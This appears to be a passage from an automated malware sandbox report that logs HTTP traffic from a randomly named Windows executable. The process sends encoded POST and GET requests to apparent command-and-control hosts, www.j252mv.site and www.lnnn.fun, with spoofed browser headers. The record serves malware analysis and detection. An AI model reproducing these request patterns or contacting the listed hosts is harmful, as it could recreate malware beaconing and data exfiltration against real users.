                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 74 79 6c 65 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 63 72 69 70 74 2d 54 79 70 65 22 20 63 [TRUNCATED]
                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="Content-Style-Type" content="text/css"><meta http-equiv="Content-Script-Type" content="text/javascript"><title>404 Error - Not Found</title><style type="text/css"></style></head><body><div id="contents"><center><h1><img src="http://www.gmo.jp/images/public/common/logo.gif" alt="GMO Internet, Inc."></h1><div id="main"><h1 class="title">404 Error - Not Found</h1><p class="detail">URL</p></br></br></br></br></br><a style="text-decoration: underline;" href="http://www.onamae-server.com/" target="_blank">.com </a> </div><div id="footer"></br><a href="http://www.onamae.com/?banner_id=634" target="_blank"> [TRUNCATED]
                                                        Nov 7, 2024 15:51:25.339797974 CET237INData Raw: 81 aa e3 82 89 e3 81 8a e5 90 8d e5 89 8d 2e 63 6f 6d 26 6c 74 3b 50 52 26 67 74 3b 3c 2f 61 3e 0a 3c 68 34 20 63 6c 61 73 73 3d 22 63 6d 6e 6d 22 3e 47 4d 4f e3 82 a4 e3 83 b3 e3 82 bf e3 83 bc e3 83 8d e3 83 83 e3 83 88 e3 82 b0 e3 83 ab e3 83
                                                        Data Ascii: .com&lt;PR&gt;</a><h4 class="cmnm">GMO</h4><div align="center"><p>Copyright (c) GMO Internet Group, Inc. All Rights Reserved.</p></div></center></div></div></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        15192.168.2.1049988150.95.254.16806584C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 7, 2024 15:51:26.988409996 CET1804OUTPOST /bjtw/ HTTP/1.1
                                                        Host: www.j252mv.site
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Accept-Encoding: gzip, deflate
                                                        Origin: http://www.j252mv.site
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Cache-Control: no-cache
                                                        Connection: close
                                                        Content-Length: 1229
                                                        Referer: http://www.j252mv.site/bjtw/
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
                                                        Data Raw: 65 4c 2d 78 3d 52 75 6c 4e 68 4b 56 6c 37 54 49 33 44 72 72 6c 72 35 37 74 36 72 65 4e 54 33 37 35 49 4c 59 74 6e 37 5a 6f 6a 77 52 61 4c 42 56 6c 6d 69 5a 77 45 5a 70 52 72 57 4b 69 4a 76 36 41 44 59 78 6b 7a 31 39 65 34 4f 33 57 43 66 45 42 38 42 44 5a 37 69 68 68 57 34 64 37 2b 76 57 41 47 76 36 71 42 6e 6f 4c 65 7a 36 52 6f 69 71 55 32 65 4d 66 76 61 30 4a 77 70 38 4f 77 79 69 35 33 32 6f 6b 4c 37 5a 75 78 33 75 42 58 42 52 4e 78 79 46 77 6d 68 77 42 4f 31 65 36 56 50 2b 4e 6f 66 56 53 70 5a 77 37 7a 61 49 76 73 6a 6a 62 42 53 52 69 4e 66 61 2b 35 79 75 4e 79 44 69 46 44 4c 42 38 2b 4b 7a 36 37 67 70 75 75 6f 73 65 38 77 36 54 56 34 2b 36 6b 2f 63 51 62 67 49 34 6f 6d 4f 50 38 37 33 30 65 69 2f 46 44 76 37 79 44 78 61 74 45 51 54 7a 38 53 62 5a 4a 43 64 4e 39 72 32 4d 4a 74 78 70 6e 43 44 50 42 30 74 38 34 33 44 64 69 50 7a 33 53 54 79 37 75 51 75 58 31 57 46 70 78 78 4f 68 79 69 39 72 36 50 52 30 78 6a 42 74 34 37 51 62 53 77 51 57 4c 76 4b 54 73 31 6f 49 51 4b 43 73 57 63 64 59 68 6d 78 6a 56 [TRUNCATED]
                                                        Data Ascii: eL-x=RulNhKVl7TI3Drrlr57t6reNT375ILYtn7ZojwRaLBVlmiZwEZpRrWKiJv6ADYxkz19e4O3WCfEB8BDZ7ihhW4d7+vWAGv6qBnoLez6RoiqU2eMfva0Jwp8Owyi532okL7Zux3uBXBRNxyFwmhwBO1e6VP+NofVSpZw7zaIvsjjbBSRiNfa+5yuNyDiFDLB8+Kz67gpuuose8w6TV4+6k/cQbgI4omOP8730ei/FDv7yDxatEQTz8SbZJCdN9r2MJtxpnCDPB0t843DdiPz3STy7uQuX1WFpxxOhyi9r6PR0xjBt47QbSwQWLvKTs1oIQKCsWcdYhmxjVa71UcyE3EpZ7MpuQ8nW74r7lAVXkc9DEIpMN+lXKR1Sgnm7PIqaV4CTYMIDxlOc9GAAAjPrCIgTLpeBZLy8i4W9OW6FnXTG3yy1vm6fl0tkf3PmpmMKmdv1yEWYltTItwuQ8Z+IBtkzVUf++u5uYCmu+x6y147Sgv+M4Q81w8sukD1D7fF8EMySdg2SdEbC/XVFzzUFKmQ/7tj8mNcnaVm4ltda+g64FO2aP5K88BCyMlCBWlqOoCo5Kne0uoVrFP8TG0XuPj68YIWSxHjURpLt2FuYPJZeRUryK6IABAMV3JwLNDRshCLRXSwPuKuQCufi7D3xAwkDCXmjgVLGLNOzJeHYmW989EsMWGxgnIickto9QPvmQk0hBT+n3nJnzW10wbWtrjSvq5IQL3s+Fu5yqi0CbcjEoSC4gImUilFUA7Hgsi5jH8h3WtE1WYALD/mQ5wditLIHf4GR7n6j8dlDE8OuQ0maH5JezEs+ja/DrDuGqtypPaJb0y5kvNprwUt20vkOCBccPcq9a09hpO2AGRB2ribd8QqUJFX6lfSkBd3UmGsji1NiS3GMMDXPLccXc4ER99KXw/MczJkki2hA/HMDm7vjRYkNALmA3aqTdOwbzaUmnE2GP2rqI3HgnVLBVwzmVzLy+8jLj+M83mRZCizrE3PIvvt [TRUNCATED]
                                                        Nov 7, 2024 15:51:27.860903978 CET1236INHTTP/1.1 404 Not Found
                                                        Date: Thu, 07 Nov 2024 14:51:27 GMT
                                                        Server: Apache
                                                        Last-Modified: Tue, 13 Sep 2022 05:17:25 GMT
                                                        Accept-Ranges: bytes
                                                        Content-Length: 1260
                                                        Connection: close
                                                        Content-Type: text/html
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 74 79 6c 65 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 63 72 69 70 74 2d 54 79 70 65 22 20 63 [TRUNCATED]
                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="Content-Style-Type" content="text/css"><meta http-equiv="Content-Script-Type" content="text/javascript"><title>404 Error - Not Found</title><style type="text/css"></style></head><body><div id="contents"><center><h1><img src="http://www.gmo.jp/images/public/common/logo.gif" alt="GMO Internet, Inc."></h1><div id="main"><h1 class="title">404 Error - Not Found</h1><p class="detail">URL</p></br></br></br></br></br><a style="text-decoration: underline;" href="http://www.onamae-server.com/" target="_blank">.com </a> </div><div id="footer"></br><a href="http://www.onamae.com/?banner_id=634" target="_blank"> [TRUNCATED]
                                                        Nov 7, 2024 15:51:27.861690044 CET237INData Raw: 81 aa e3 82 89 e3 81 8a e5 90 8d e5 89 8d 2e 63 6f 6d 26 6c 74 3b 50 52 26 67 74 3b 3c 2f 61 3e 0a 3c 68 34 20 63 6c 61 73 73 3d 22 63 6d 6e 6d 22 3e 47 4d 4f e3 82 a4 e3 83 b3 e3 82 bf e3 83 bc e3 83 8d e3 83 83 e3 83 88 e3 82 b0 e3 83 ab e3 83
                                                        Data Ascii: .com&lt;PR&gt;</a><h4 class="cmnm">GMO</h4><div align="center"><p>Copyright (c) GMO Internet Group, Inc. All Rights Reserved.</p></div></center></div></div></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        16192.168.2.1049989150.95.254.16806584C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 7, 2024 15:51:29.528069019 CET515OUTGET /bjtw/?eL-x=csNti9Ni0CMSF+Luu5Lb4YGLWTncdI4NtLZHzGNdKQ96nntWCfQjnA+gcdSxDY8YzUt2/7rDdvxAnlLOvCpJP4lTvOHTPP+iYlkpfhDtlBKj7b5q5w==&wFVH=-zwTKPF0iPth HTTP/1.1
                                                        Host: www.j252mv.site
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Connection: close
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
                                                        Nov 7, 2024 15:51:30.407376051 CET1236INHTTP/1.1 404 Not Found
                                                        Date: Thu, 07 Nov 2024 14:51:30 GMT
                                                        Server: Apache
                                                        Last-Modified: Tue, 13 Sep 2022 05:17:25 GMT
                                                        Accept-Ranges: bytes
                                                        Content-Length: 1260
                                                        Connection: close
                                                        Content-Type: text/html
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 74 79 6c 65 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 63 72 69 70 74 2d 54 79 70 65 22 20 63 [TRUNCATED]
                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="Content-Style-Type" content="text/css"><meta http-equiv="Content-Script-Type" content="text/javascript"><title>404 Error - Not Found</title><style type="text/css"></style></head><body><div id="contents"><center><h1><img src="http://www.gmo.jp/images/public/common/logo.gif" alt="GMO Internet, Inc."></h1><div id="main"><h1 class="title">404 Error - Not Found</h1><p class="detail">URL</p></br></br></br></br></br><a style="text-decoration: underline;" href="http://www.onamae-server.com/" target="_blank">.com </a> </div><div id="footer"></br><a href="http://www.onamae.com/?banner_id=634" target="_blank"> [TRUNCATED]
                                                        Nov 7, 2024 15:51:30.407434940 CET237INData Raw: 81 aa e3 82 89 e3 81 8a e5 90 8d e5 89 8d 2e 63 6f 6d 26 6c 74 3b 50 52 26 67 74 3b 3c 2f 61 3e 0a 3c 68 34 20 63 6c 61 73 73 3d 22 63 6d 6e 6d 22 3e 47 4d 4f e3 82 a4 e3 83 b3 e3 82 bf e3 83 bc e3 83 8d e3 83 83 e3 83 88 e3 82 b0 e3 83 ab e3 83
                                                        Data Ascii: .com&lt;PR&gt;</a><h4 class="cmnm">GMO</h4><div align="center"><p>Copyright (c) GMO Internet Group, Inc. All Rights Reserved.</p></div></center></div></div></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        17192.168.2.1049990188.114.96.3806584C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 7, 2024 15:51:35.669001102 CET758OUTPOST /u5w9/ HTTP/1.1
                                                        Host: www.lnnn.fun
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Accept-Encoding: gzip, deflate
                                                        Origin: http://www.lnnn.fun
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Cache-Control: no-cache
                                                        Connection: close
                                                        Content-Length: 193
                                                        Referer: http://www.lnnn.fun/u5w9/
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
                                                        Data Raw: 65 4c 2d 78 3d 4e 31 6a 4f 75 34 67 54 52 78 75 33 63 43 4c 33 47 6e 48 72 41 35 52 6c 4c 74 63 6c 44 49 31 75 30 77 30 57 57 2f 77 79 6c 33 69 61 63 34 51 69 51 4c 46 35 6a 73 39 4c 79 54 32 44 39 47 6b 4d 72 31 6f 38 48 39 56 6b 57 66 63 6e 57 61 30 6f 6f 46 39 62 73 6e 65 64 72 62 34 59 67 4f 63 4c 36 6b 4b 30 74 52 6e 62 6e 4f 47 78 57 2f 39 57 6d 57 4f 76 58 51 6e 70 57 77 2f 76 64 50 58 53 72 62 39 44 71 36 6e 64 71 7a 59 4e 68 59 34 44 77 50 42 46 64 67 5a 46 48 31 4c 55 67 76 69 68 67 48 31 4f 33 39 31 6e 5a 46 5a 6f 42 6c 56 49 38 4e 64 39 46 61 36 63 75 6b 63 6a
                                                        Data Ascii: eL-x=N1jOu4gTRxu3cCL3GnHrA5RlLtclDI1u0w0WW/wyl3iac4QiQLF5js9LyT2D9GkMr1o8H9VkWfcnWa0ooF9bsnedrb4YgOcL6kK0tRnbnOGxW/9WmWOvXQnpWw/vdPXSrb9Dq6ndqzYNhY4DwPBFdgZFH1LUgvihgH1O391nZFZoBlVI8Nd9Fa6cukcj
                                                        Nov 7, 2024 15:51:36.983582973 CET866INHTTP/1.1 404 Not Found
                                                        Date: Thu, 07 Nov 2024 14:51:36 GMT
                                                        Content-Type: text/html
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cLiuIp9HcEQPY7hN%2FKJsx3f1DHr3StLqSez%2B7Z1neRXJMz%2BvqB4lxxgIjm9PeCVIbOWNqi5IlrAN0EVTgOsIIWksLBQIvDN9tNv08Cgns2yDYkIwSc6QYnJ4re%2Fwfqc%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8dee246f2a3f2c8d-DFW
                                                        Content-Encoding: gzip
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1230&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=758&delivery_rate=0&cwnd=138&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 35 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 30 b4 f3 cb 2f 51 70 cb 2f cd 4b b1 d1 cf 30 b4 0b c9 48 55 28 4a 2d 2c 4d 2d 2e 49 4d 51 08 0d f2 51 d0 2f 35 2d b7 d4 57 28 4f 2c 56 c8 cb 2f 51 48 03 29 55 c8 cf 53 28 c9 c8 2c 56 28 4e 2d 2a 4b 2d d2 03 00 fa b4 bc 15 48 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 5a0/Qp/K0HU(J-,M-.IMQQ/5-W(O,V/QH)US(,V(N-*K-H0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        18192.168.2.1049991188.114.96.3806584C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 7, 2024 15:51:38.205995083 CET782OUTPOST /u5w9/ HTTP/1.1
                                                        Host: www.lnnn.fun
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Accept-Encoding: gzip, deflate
                                                        Origin: http://www.lnnn.fun
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Cache-Control: no-cache
                                                        Connection: close
                                                        Content-Length: 217
                                                        Referer: http://www.lnnn.fun/u5w9/
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
                                                        Data Raw: 65 4c 2d 78 3d 4e 31 6a 4f 75 34 67 54 52 78 75 33 64 69 37 33 4b 6b 76 72 52 4a 52 6d 53 64 63 6c 4a 6f 30 47 30 77 77 57 57 2b 46 33 6c 46 32 61 63 5a 67 69 42 36 46 35 69 73 39 4c 71 44 32 43 7a 6d 6b 54 72 31 31 4c 48 2f 42 6b 57 66 34 6e 57 66 49 6f 6f 32 6c 55 76 58 65 66 6a 37 34 57 75 75 63 4c 36 6b 4b 30 74 52 79 4f 6e 50 69 78 57 4c 35 57 67 33 4f 6f 55 51 6e 71 62 67 2f 76 4f 66 58 57 72 62 38 57 71 2f 2f 33 71 32 55 4e 68 64 63 44 77 39 70 4b 58 67 5a 48 4b 56 4b 63 6a 38 58 37 6e 32 59 32 2f 4d 31 4c 4e 45 6c 34 50 6b 6f 50 74 63 38 71 57 74 6d 53 67 69 70 4a 6d 70 71 43 49 48 4f 38 33 4e 6b 52 53 49 41 71 4a 4f 78 7a 61 77 3d 3d
                                                        Data Ascii: eL-x=N1jOu4gTRxu3di73KkvrRJRmSdclJo0G0wwWW+F3lF2acZgiB6F5is9LqD2CzmkTr11LH/BkWf4nWfIoo2lUvXefj74WuucL6kK0tRyOnPixWL5Wg3OoUQnqbg/vOfXWrb8Wq//3q2UNhdcDw9pKXgZHKVKcj8X7n2Y2/M1LNEl4PkoPtc8qWtmSgipJmpqCIHO83NkRSIAqJOxzaw==
                                                        Nov 7, 2024 15:51:39.472732067 CET858INHTTP/1.1 404 Not Found
                                                        Date: Thu, 07 Nov 2024 14:51:39 GMT
                                                        Content-Type: text/html
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sRxxn1pXSDSA587GpSj90oPYxzGyveokoLtTkYyVRy1nq0NLpSZ7kFrJLNqIn6fTWk33gkp1aNqSH3WB3KKNZicB7zbDS7bH4TtPmC77q2ftmHXOU3MNflD2NNwQwpo%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8dee247f1b5947a5-DFW
                                                        Content-Encoding: gzip
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1635&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=782&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 35 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 30 b4 f3 cb 2f 51 70 cb 2f cd 4b b1 d1 cf 30 b4 0b c9 48 55 28 4a 2d 2c 4d 2d 2e 49 4d 51 08 0d f2 51 d0 2f 35 2d b7 d4 57 28 4f 2c 56 c8 cb 2f 51 48 03 29 55 c8 cf 53 28 c9 c8 2c 56 28 4e 2d 2a 4b 2d d2 03 00 fa b4 bc 15 48 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 5a0/Qp/K0HU(J-,M-.IMQQ/5-W(O,V/QH)US(,V(N-*K-H0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        19192.168.2.1049992188.114.96.3806584C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 7, 2024 15:51:40.758377075 CET1795OUTPOST /u5w9/ HTTP/1.1
                                                        Host: www.lnnn.fun
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Accept-Encoding: gzip, deflate
                                                        Origin: http://www.lnnn.fun
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Cache-Control: no-cache
                                                        Connection: close
                                                        Content-Length: 1229
                                                        Referer: http://www.lnnn.fun/u5w9/
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
                                                        Data Raw: 65 4c 2d 78 3d 4e 31 6a 4f 75 34 67 54 52 78 75 33 64 69 37 33 4b 6b 76 72 52 4a 52 6d 53 64 63 6c 4a 6f 30 47 30 77 77 57 57 2b 46 33 6c 46 75 61 63 72 6f 69 51 70 39 35 68 73 39 4c 30 54 32 66 7a 6d 6b 61 72 31 39 48 48 2f 4e 30 57 64 51 6e 51 35 38 6f 6b 54 52 55 34 6e 65 66 68 37 34 62 67 4f 63 6b 36 69 71 34 74 52 69 4f 6e 50 69 78 57 4b 4a 57 6a 6d 4f 6f 62 77 6e 70 57 77 2f 7a 64 50 57 78 72 62 30 47 71 2f 4c 4e 71 6c 63 4e 67 37 38 44 79 75 42 4b 66 67 5a 2f 4a 56 4b 74 6a 38 4b 6c 6e 79 42 50 2f 4d 41 75 4e 48 31 34 4e 46 5a 6a 70 49 49 38 49 72 2b 31 2b 68 5a 72 73 75 71 58 42 6d 37 50 77 73 4e 4a 49 49 4a 49 64 61 6f 6a 42 77 71 6d 2f 39 49 58 6b 62 7a 30 62 46 41 77 30 6e 2f 56 71 53 70 44 62 42 2f 64 32 4b 6d 76 55 56 39 52 41 75 65 69 59 78 4f 59 66 6b 65 58 4f 55 34 4c 38 76 41 6e 6d 31 46 58 75 61 71 68 4e 7a 51 76 48 7a 6d 71 48 37 65 41 56 30 34 49 48 6e 5a 62 30 34 6e 65 73 70 54 4d 33 4a 62 57 73 45 79 79 4e 44 38 2f 2f 78 54 78 45 32 35 33 35 6a 50 67 7a 58 6e 63 46 58 70 6c 78 [TRUNCATED]
                                                        Data Ascii: eL-x=N1jOu4gTRxu3di73KkvrRJRmSdclJo0G0wwWW+F3lFuacroiQp95hs9L0T2fzmkar19HH/N0WdQnQ58okTRU4nefh74bgOck6iq4tRiOnPixWKJWjmOobwnpWw/zdPWxrb0Gq/LNqlcNg78DyuBKfgZ/JVKtj8KlnyBP/MAuNH14NFZjpII8Ir+1+hZrsuqXBm7PwsNJIIJIdaojBwqm/9IXkbz0bFAw0n/VqSpDbB/d2KmvUV9RAueiYxOYfkeXOU4L8vAnm1FXuaqhNzQvHzmqH7eAV04IHnZb04nespTM3JbWsEyyND8//xTxE2535jPgzXncFXplxwyXCe3XFtuoHJeL5O3OYwky044L8EeAXc6nn4z6m96Jep6kE95PjHq5CR5mmuuJTiS5YXMZXnBWzcySn+QS7vYuk9Dgyr+WhQL+VOus6wAdVCqZhxP8/Lc24vHe32IpDF76P+omKjd4dWqWWKIqqb/LSU22AxsJiVLOLBYh/Spm72nwDOMTEgeiMg7NSnZj5rvgeG/8tdFZcX44ArxHQUcm9ctqBn9/10ZgFrc0ZRTg18EjDtSm26DCZYXnKnR2bWVjVkcDxlo04c/tzvOQ2WBNWGskq2ArC3NkozLalwUltnZ4oByFxlkyjno1GwKo8q/SZzqSZHok9oV6ptUhpJLf6iUNpQCl8QMKNtxPGeCKA5IHLa4K5LsLZN6AgdZmeLaqtslry2eZ5v7YfyPWXiQQgBwfl1shm2bB55bllu25ijRIrgEawtXrfWDNtHrO0asQ69W2XgBstxZu6DLl06tLjYhe5NHjq5XA4Req5KEmr6KlkysUeMDN3ExufGY3+TOqZEdnGyqp2XZJDGBz+iG5H4U5BjVq9n8OtVy1ft68m/D90kWkSTHFVi25D5nFbwZ+UwQi2tULugQ1TNqeGNYzLXOLWzzdqTUwbW3MVOWW852Cq2T8xP3qAPBIeAag3ziqJKy6U/Mm57j9BZtLSM2eMO+GYKnlmTu [TRUNCATED]
                                                        Nov 7, 2024 15:51:42.018539906 CET870INHTTP/1.1 404 Not Found
                                                        Date: Thu, 07 Nov 2024 14:51:41 GMT
                                                        Content-Type: text/html
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PJLK%2Fxikx%2FDcvxx5Jc8gZS9Qy2wWd0K%2Bw7xLJ6%2Fwn348Zk8gVZEB5r1W4a0%2FtSpFjMbZzaUIdnMuRceUCUjGCOEsp5ddzUbwBwAs%2FqUz%2BZP%2FPq0DArsiNzZ37ZNOjSw%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8dee248f0b2e3acc-DFW
                                                        Content-Encoding: gzip
                                                        alt-svc: h3=":443"; ma=86400
